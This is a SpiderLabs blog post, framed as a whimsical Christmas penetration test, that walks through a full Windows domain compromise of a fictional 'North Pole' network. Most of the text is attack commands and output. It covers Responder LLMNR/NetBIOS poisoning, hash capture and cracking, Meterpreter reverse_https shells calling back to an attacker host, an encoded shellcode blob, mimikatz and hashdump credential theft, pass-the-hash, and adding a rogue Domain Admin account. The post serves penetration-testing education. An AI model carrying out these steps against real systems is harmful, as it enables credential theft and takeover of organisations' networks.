SpiderLabs Blog

How Snotnose the Elf was Able to Compromise The North Pole Domain and Retrieve the Nice and Naughty Lists

Written by Theresa | Dec 20, 2013 6:26:00 AM

Last Winter, Snotnose won the North vs South Pole CTF contest, and Santa awarded him the ultimate prize; to perform an undercover penetration test against the internal North Pole network in the hopes of being hired on full time. The goal was to gain Domain Admin rights and recover the "Nice" and "Naughty" lists without being caught by the Network Security Elf team. If he succeeded, he would be hired and made part the Security Team. Being an enterprising elf, he kept up with the SpiderLabs Anterior blog…

The first thing Snotnose the Elf kicked off on the North Pole internal penetration test was Responder. Laurent Gaffié created Responder for SpiderLabs in October 2012. Snotnose recommends that everyone read the following links for more in-depth information:

http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html http://blog.spiderlabs.com/2013/11/spiderlabs-responder-updates.html

Typically, when a Windows workstation needs to request a name lookup, it checks the following places in order:

  1. Local Hosts File
  2. Configured DNS Servers
  3. LLMNR
  4. NetBIOS Broadcasts

Snotnose knows that if the request fails on both the local hosts file and DNS servers, Windows will take addresses that do not resolve and request the address from the local network through a LLMNR request to determine if the host is on the local network. By responding to these requests, an attacker has the ability to take advantage of these errors and allow these requests to be serviced by the attacker's system. By doing so, the attacker can receive the credentials for Intranet authentication as well as potentially serve malicious pages back to the requester. And if an LLMNR request fails it then makes a broadcast NetBIOS request on the local network. Since this is a broadcast request, any system on the local network can answer. Using Responder, Snotnose's system is able to respond as a functional service without the need to ARP spoof (and possibly trigger countermeasures).

~/Responder# python Responder.py -i 192.168.8.150
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.
…snip…

NBT-NS Answer sent to: 192.168.8.6
[+]SMB-NTLMv2 hash captured from : 192.168.8.6
Domain is : THEPOLEOFTHENORTH
User is : peppertoes
[+]SMB complete hash is : peppertoes::THEPOLEOFTHENORTH:1122334455667788:reallylonghash
Share requested: \\WoodenToys\IPC$
…snip...

LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from : 192.168.8.11
Domain is : THEPOLEOFTHENORTH
User is : frostsparkles
[+]SMB complete hash is : frostsparkles::THEPOLEOFTHENORTH:1122334455667788:reallylonghash
Share requested: \\TechGadgets\AppleIPC$
…snip…

Password hashes, whether LM, NTLMv1, or NTLMv2, can be cracked using brute force and dictionary attacks. If a Domain Admin account is captured during a responder session, it can be used to access a computer on the Domain, and a Domain Admin account can easily be created.

Using Responder, Snotnose was able to recover numerous password hashes for THEPOLEOFTHENORTH domain users. And while most of these were in the updated NTLMv2 format (the most robust hashing method currently supported by Windows), it was still possible to take them offline for cracking purposes using a combination of brute force and rainbow tables. While Snotnose was unable to crack all the hashed credentials into their plaintext version, he was able to crack quite a few. One hash, sleighbellexec::THEPOLEOFTHENORTH:1122334455667788:reallylonghash, was taken offline and successfully cracked into its plaintext version "sleighbellexec:silv3rb3ll$".

Using "sleighbellexec:silv3rb3ll$".", Snotnose compromised 192.168.8.45 using a combination of winexec and Metasploit's meterpreter.

PAYLOAD => windows/meterpreter/reverse_https
EXITFUNC => THREAD
LPORT => 443
LHOST => 192.168.8.150
[*] Started HTTPS reverse handler on https://192.168.8.150:443/
[*] Starting the payload handler...
[*] 192.168.8.45:3713 Request received for /dz1M...
[*] 192.168.8.45:3713 Staging connection for target /dz1M received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (192.168.8.150:443 -> 192.168.8.45:3713) at 2013-12-15 08:44:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : NP-ITHD133
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

As Snotnose migrated into the winlogon.exe process and ran mimikatz to recover the plaintext credentials stored in memory he began singing,
"Oh mimikatz! Oh mimikatz!
Thy cleartext password recovery is amazing!"

Mimikatz is extremely useful as it recovers the plaintext password of the current user(s) logged into Windows after being injected into LSASS to dump the process memory. In turn, wdigest was designed by Microsoft to use with HTTP and other areas of authentication where more than just the hash is needed. With mimikatz, an attacker does not need to recover local hashes, to attempt crack or use "Pass the Hash" to gain access to the systems (if they are even being stored in Active Directory or local SAM files).

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
[*] ssp credentials
===============

AuthID Package Domain User Password
------ ------- ------ ---- --------

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;927 Negotiate NT AUTHORITY LOCAL SERVICE
0;57638 NTLM
0;129 Negotiate THEPOLEOFTHENORTH NP-ITHD133$
9e ad b1 hg 7c b4 c8 8f wr 68 c5 6d ac 76 34 24 6f f3 6b 26 83 kk 93 56 2b c4 6e 8d
0;236 Negotiate NT AUTHORITY NETWORK SERVICE
9e ad b1 hg 7c b4 c8 8f wr 68 c5 6d ac 76 34 24 6f f3 6b 26 83 kk 93 56 2b c4 6e 8d
0;42435741 Kerberos THEPOLEOFTHENORTH sleighbellexec silv3rb3ll$
0;159934 Kerberos THEPOLEOFTHENORTH mullingpudding 1mk1ing0fth3n0rth!@#$%^&*()

In addition, it was also possible to dump the hashed credentials in memory.

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against NP-ITHD133
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20131205062537_default_192.168.8.45_windows.hashes_625938.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d961617ec3a2456b36e647185deb1a9e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] northadmin1:"duh"
[*] Dumping password hashes...
[+] northadmin1:500:aad3b435b51404eeaad3b435b51404ee:7bb30f99b959a0e4eb352cfa90ba824e:::

Snotnose successfully repeated the above process on each of the following systems, and cleartext and hashed credentials were recovered from memory as each system was compromised using mimikatz and smart_hashdump:

192.168.8.45
192.168.8.137
192.168.8.138
192.168.8.143
192.168.8.152
192.168.8.153
192.168.8.159
192.168.8.190
192.168.8.213

Snotnose used Metasploit's enum_termserv to find additional systems in order to avoid using ICMP, TCP, and UDP ping and port scans. This module dumps information on files most recently used (MRU) and connection data for RDP sessions of the enumerated system.

...snip...
*] Meterpreter session 1 opened (192.168.8.150:443 -> 192.168.8.45:2778) at 2013-12-16 10:40:59 -0600

meterpreter > getsystem
...got system (via technique 1).
meterpreter > run post/windows/gather/enum_termserv

[*] Doing enumeration for S-1-5-21-8332354425-3854232395-9939727367-7984
[*] Doing enumeration for S-1-5-21-8332354425-3854232395-9939727367-900
[*] Doing enumeration for S-1-5-21-9939727367-2626759393-8332354425-13452
[*] Doing enumeration for S-1-5-21-9939727367-2626759393-8332354425-1640
[+] Systems connected to:
[+] --> npdc01
[+] --> npdc02
[+] --> 192.168.8.75
[+] Server list and user hints:
[+] 192.168.8.75 is connected to as THEPOLEOFTHENORTH\peppersnaps
[+] npdc01 is connected to as THEPOLEOFTHENORTH\peppersnaps
[+] npdc02 is connected to as
...snip...

As 192.168.8.45 had the most connections and the cleartext password had been recovered for the user "mullingpudding" using mimikatz, Snotnose switched to using the "mullingpudding" account to compromise additional systems:

192.168.8.109
192.168.8.106
192.168.8.141
192.168.5.89
192.168.5.102
192.168.5.104
192.168.5.109
192.168.5.118
192.168.5.129
192.168.5.110
192.168.5.113
192.168.5.143
192.168.53.150
192.168.53.172
192.168.53.175
192.168.53.176
192.168.6.106
192.168.10.106
192.168.11.105
192.168.12.112
192.168.13.104
192.168.15.105
192.168.71.194
192.168.72.124
192.168.73.107
192.168.74.107
192.168.75.135
192.168.81.100
192.168.82.106
192.168.132.116

A Domain Administrator account was recovered in cleartext from 192.168.5.109 using the mimikatz module in Metasploit. It was possible to enumerate the Domain Controller with enum4linux and verify the Domain Administrators:

# cat 192.168.4.151-dc.out | grep "Domain Admins"
Group 'Administrators' (RID: 544) has member: THEPOLEOFTHENORTH\Domain Admins
group:[Domain Admins] rid:[0x200]
Group 'ESHCT_Admin' (RID: 21794) has member: THEPOLEOFTHENORTH\Domain Admins
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\trufflecake
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\northadmin1
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\shinybuns
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\fairyfluff
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\sparklecrackers
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\LANSleigh
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\starpudding
Group 'Domain Admins' (RID: 512) has member: THEPOLEOFTHENORTH\peppersnaps
Group 'JingleBells' (RID: 4494) has member: THEPOLEOFTHENORTH\Domain Admins
Group 'NandNListAdmins' (RID: 14246) has member: THEPOLEOFTHENORTH\Domain Admins
S-1-5-21-823518204-1637723038-725345543-512 THEPOLEOFTHENORTH\Domain Admins (Domain Group)

Using the "shinybuns:$G1ng3rbr34dc00k1354r3myf4v0r1t3" account, Snotnose compromised the Domain Controller:

# ./scepwn.sh 'THEPOLEOFTHENORTH/shinybuns%$G1ng3rbr34dc00k1354r3myf4v0r1t3' npdc01
[*] //localhost/smb_share is hot and serving sce.32.exe, good to go
[*] Generating reverse_https opcode for sce using 192.168.8.150 as lhost
[*] x86/alpha_mixed succeeded with size 792 (iteration=1)

PYIIIIIIIIIIIIIIIYS85z7f3549Uu693824583396969N38FfA9j787P632962GV8X7UhTQqjzcmnJrgdzpBfzDd8rjNZKpRQcjXhsQ2xqQmatEYqJQmPNLele1qlGrdlq0o1zoVmUQyWM2ZPV2BwNk1B20LKG27Lc1jpNkQP2XouYP3DrjUQhP2pLKSx5HNkChQ0VahSkSElriNk7DLKC1HV6QkO01iPnLO1JotMeQo7Txip0uxYS85z7f3549Uu693824583396969N38FfA9j787P632962GV8X7UhTQqjzcmnJrgdzpBfzDd8rjNZKpRQcjXhsQ2xqQmatEYqJQmzWs2qpQqxOKWqC0uPaCv01xBwLImOo69okeJKaX0YeaKRJVp554c32947758776348746932582572834565344m7D9256Z9EBxWr43aHPc6zhxvCQ9Zq5ujUUkhFQFE72PCqebNNJsnU5rddzpBfzDd8rjNZKpRQcjXhsQ2xqQmatEYqJQmbJEOaFaxPuSvOnK69oN5fQkORwBwf7F7cf3X4mC628cKkOhUmUo0D57jpKptR0hkKeJK1Y8hLsKOio0588pmelbrvKOJuazg0CXs0vp7pC0Qx5P5Pg05PF7Phbx94PSm5Ion5z3sc0SniHgpW58C0gP7pWp3c1FU87bofk9xb9oIElE9PSDJmlK7wC1KsK5KpPuM5F8iSyxCayokOyoea5gfRVNUbWBtnwEVQvNdrWEfRGpAA
######################################################################################################################
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https EXITFUNC=THREAD LPORT=443 LHOST=192.168.8.150 E
######################################################################################################################
Make sure you have multi handler up to catch shells (see above). Press [Enter] key to start pwning...
[*] psexexing....

LHOST => 192.168.8.150
[*] Started HTTPS reverse handler on https://192.168.8.150:443/
[*] Starting the payload handler...
[*] 192.168.4.151:61593 Request received for /WNGp...
[*] 192.168.4.151:61593 Staging connection for target /WNGp received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (192.168.4.151:443 -> 192.168.8.150:61593) at 2013-12-17 09:56:16 -0600

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer : NPDC01
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64

Snotnose then ran Metasploit's smart_hashdump module to recover all the hashed credentials from the Domain Controller:

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against NPDC01
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20131217094718_default_192.168.4.151_windows.hashes_654372.txt
[+] This host is a Domain Controller!
[*] Dumping password hashes...
[-] Failed to dump hashes as SYSTEM, trying to migrate to another process
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+] northadmin1:500:aad3b435b51404eeaad3b435b51404ee:7bb30f99b959a0e4eb352cfa90ba824e
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8
[+] silverbaubles:1000:aad3b435b51404eeaad3b435b51404ee:a7cee25799f518f9bd886683a13ed6d0
[+] pepperpie:1106:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622
[+] twinklesnaps:1108:aad3b435b51404eeaad3b435b51404ee:1047f0b952cfbffbdd6c34ef6bd610e5
[+] candypears:1109:aad3b435b51404eeaad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a
[+] pepperlights:1125:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818
[+] ivysocks:1133:aad3b435b51404eeaad3b435b51404ee:4231db4c15025d1951f3c0d39d8656a2
[+] starcane:1147:aad3b435b51404eeaad3b435b51404ee:02d0a4d2b6c7d485a935778eb90e0446
...snip...

Over 2,500 hashed Windows login credentials were recovered from the Domain Controller. Snotnose then created a Domain Admin account on 192.168.4.151:

meterpreter > shell
Process 6864 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd\
cd\

C:\>ipconfig
ipconfig

Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.4.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.4.1

C:\>net user snotnose j1ngl3dURb3ll$ /add /domain
net user snotnose j1ngl3dURb3ll$ /add /domain
The command completed successfully.

C:\>net group "Domain Admins" snotnose /add /domain
net group "Domain Admins" snotnose /add /domain
The command completed successfully.

Snotnose now had complete control of the Windows network due to Domain Admin access, and multiple actions could be taken to impact security and business production of the North Pole. With complete access to all the information stored on THEPOLEOFTHENORTH file and email servers, as well as the data stored in Microsoft SQL databases, and all user data on THEPOLEOFTHENORTH workstations it was time to track down the "Nice" and "Naughty" lists. And while Snotnose could deploy keyloggers, backdoors, memory dumpers, or any software desired via Group Policy to track down who has been regularly accessing the lists, he didn't need to. When he enumerated the Domain Admins lists, one of the groups was called "NandNListAdmins". Going back to the Domain Controller, Snotnose enumerated the "NandNListAdmins" group:

# cat 192.168.4.151-dc.out | grep "NandNListAdmins"
Group 'NandNListAdmins' (RID: 34146) has member: THEPOLEOFTHENORTH\Domain Admins
group:[NandNListAdmins] rid:[0x400]
Group 'NandNListAdmins' (RID: 522) has member: THEPOLEOFTHENORTH\santa
Group 'NandNListAdmins' (RID: 522) has member: THEPOLEOFTHENORTH\cuddlestockings
Group 'NandNListAdmins' (RID: 522) has member: THEPOLEOFTHENORTH\toffeebubbles

Snotnose then enumerated the Responder-Session.log to see if santa, cuddlestockings, or toffeebubbles had logged into any systems the previous 3 days.

12/15/2013 10:51:00 AM LLMNR poisoned answer sent to this IP: 192.168.20.200. The requested name was : wpad.
12/15/2013 10:51:00 AM [+]No cookies were sent with this request
12/15/2013 10:51:03 AM [+] OsVersion is:Windows Server 2008 R2 Standard 7601 Service Pack 1
12/15/2013 10:51:03 AM [+] ClientVersion is :Windows Server 2008 R2 Standard 6.1
12/15/2013 10:53:27 AM [+]SMB-NTLMv2 hash captured from : 192.168.20.200
12/15/2013 10:53:27 AM [+]Domain is : THEPOLEOFTHENORTH
12/15/2013 10:53:27 AM [+]User is : toffeebubbles
12/15/2013 10:53:27 AM [+]SMB complete hash is : toffeebubbles:THEPOLEOFTHENORTH:1122334455667788:reallylonghash
12/15/2013 10:53:27 AM [+]Share requested: \\Lists\NiceIPC$

Going back to the Domain Controller dump in /root/.msf4/loot/20131217094718_default_192.168.4.151_windows.hashes_654372.txt, Snotnose grepped for the hashed credential of toffeebubbles.

# cat 20131217094718_default_192.168.4.151_windows.hashes_654372.txt | grep toffeebubbles
toffeebubbles(current):1194:aad3b435b51404eeaad3b435b51404ee:3019d5d61cdf713c7b677efefc22f0e5:::

Snotnose then passed the hash to compromise 192.168.20.200.

#export SMBHASH=aad3b435b51404eeaad3b435b51404ee:3019d5d61cdf713c7b677efefc22f0e5
# ./sce.pwn.sh 'THEPOLEOFTHENORTH/toffeebubbles%asdf' 192.168.20.200
[*] //localhost/smb_share is hot and serving sce.32.exe, good to go
[*] Generating reverse_https opcode for sce using 192.168.8.150 as lhost
[*] x86/alpha_mixed succeeded with size 790 (iteration=1)

PYIIIIIIIIIIIIIIII23738395837w3B98955728428227884954257275246877786965926278259486983774336555344972427935265268847853rl0qBrwNkaBtPnkW2el7qhPLK1PcHmUiP3DCzC1HPrpnkaXghlKv8gPGqXSkSUlrilK04NkEQ9FFQioTqkpnLIQXO4MWqxG7H9pd5htc3QmihekcMddSEXbrxnkf8FDEQHSsVNkDLBklKq23738395837w3B98955728428227884954257275246877786965926278259486983774336555344972427935265268847853KOyEtqkOV7rwrwrwPj7paD0h6ZpVd997yokezKCockvQiYPQv1sZ4CpQF1RHmkC1GpUPv3rpBHbwK9mOjfioN5xkW8PYvQjr0RPh5PUby0mTcbqB2rrqv2v0u8jKse4nGKiozuk9XF0jvpskSXk0UcUPEPLIkPazGtF0RJ7oRvbHbUQVonk6yohUP19obwBwqGBwPVSXDmS6FxqkYoKeOu9PqegjRkrTr023738395837w3B98955728428227884954257275246877786965926278259486983774336555344972427935265268847853x5mrsfiojuaz3pbHuP20uPgp1x30eP1P30671xF894rsZEkOJuMCQC63k9hg2wE8Gpq0uPuP3caFrH7bofK9zBYoN5k5iP2TXMnkVgFaJcLEO0qeheqHHCix2qKOyokOuatpFN4qtp6NFWP0VNFR6Q4pC0AA
######################################################################################################################
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https EXITFUNC=THREAD LPORT=443 LHOST=192.168.8.150 E
######################################################################################################################
Make sure you have multi handler up to catch shells (see above). Press [Enter] key to start pwning...
[*] psexexing....

PAYLOAD => windows/meterpreter/reverse_https
EXITFUNC => THREAD
LPORT => 443
LHOST => 192.168.8.150
[*] Started HTTPS reverse handler on https://192.168.8.150:443/
[*] Starting the payload handler...
[*] 192.168.20.200:3713 Request received for /dz1M...
[*] 192.168.20.200:3713 Staging connection for target /dz1M received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (192.168.8.150:443 -> 192.168.20.200:3713) at 2013-12-18 03:44:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : NP-NNLSS01
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64

Snotnose again migrated into the winlogon.exe process and ran mimikatz to recover the plaintext credentials stored in memory:

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
[*] ssp credentials
===============

AuthID Package Domain User Password
------ ------- ------ ---- --------

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;927 Negotiate NT AUTHORITY LOCAL SERVICE
0;57638 NTLM
0;129 Negotiate THEPOLEOFTHENORTH NP-NNLSS01$
9e ad b1 hg 7c b4 e8 8f wr 93 a5 2d jh 76 63 11 6f f3 6b 26 83 hn 93 56 2b c4 9u 2w
0;236 Negotiate NT AUTHORITY NETWORK SERVICE
9e ad b1 hg 7c b4 e8 8f wr 93 a5 2d jh 76 63 11 6f f3 6b 26 83 hn 93 56 2b c4 9u 2w
0;42435741 Kerberos THEPOLEOFTHENORTH sleighbellexec R1ng$4r3uLi5t3n1ng
0;159934 Kerberos THEPOLEOFTHENORTH toffeebubbles 1kn0wwh01$n4ughtyn1c3!¢∞∂

Taking the cleartext password recovered from mimikatz, Snotnose used smbclient to compromise the List share on 192.168.20.200.

# smbclient -W THEPOLEOFTHENORTH -U 'toffeebubbles%1kn0wwh01$n4ughtyn1c3!¢∞∂' \\\\192.168.20.200\\Lists
Domain=[THEPOLEOFTHENORTH] OS=[Windows Server 2008 R2 3790 Service Pack 2] Server=[Windows Server 2008 R2 5.2]
smb: \> cd lists
smb: \lists\> dir
. D 0 Fri Dec 13 11:10:35 2013
.. D 0 Fri Dec 13 11:10:35 2013
naughty D 0 Fri Dec 13 11:19:21 2013
nice D 0 Fri Dec 13 11:10:35 2013

smb: \lists\> cd naughty
smb: \lists\naughty\> dir
. D 0 Fri Dec 13 11:10:35 2013
.. D 0 Fri Dec 13 11:10:35 2013
naughty.txt A 125293 Fri Dec 13 11:19:21 2013

At this point Snotnose had accessed the naughty.txt file —the world's naughty list compiled since Christmas 2012.

Since Snotnose had been in the internal network environment for four days without the security team even knowing, he figured it was time to let Santa know how far he had gotten.

Due to the rules of engagement set for this test by Santa, normal network reconnaissance using ICMP, TCP, and UDP ping and port scans was not utilized by Snotnose. However, multiple systems initially compromised during the testing window had port 445 open and were compromised with the local admin sleighbellexec account recovered from NetBIOS and LLMNR name-service poisoning. As each system was compromised, cleartext user accounts were recovered from memory using mimikatz. Once a Domain Admin account was recovered it ultimately lead to the compromise of the entire THEPOLEOFTHENORTH domain. Snotnose expanded the compromise out to over 35 systems across 18 VLANs with the use of the Domain Admin account he created for himself. Furthermore, since the Domain controller was compromised, over 2,500 hashed credentials were recovered. Ultimately, Snotnose not only compromised the Domain but recovered both the "Nice" and "Naughty" lists securing himself a position on Santa's Network Security Team.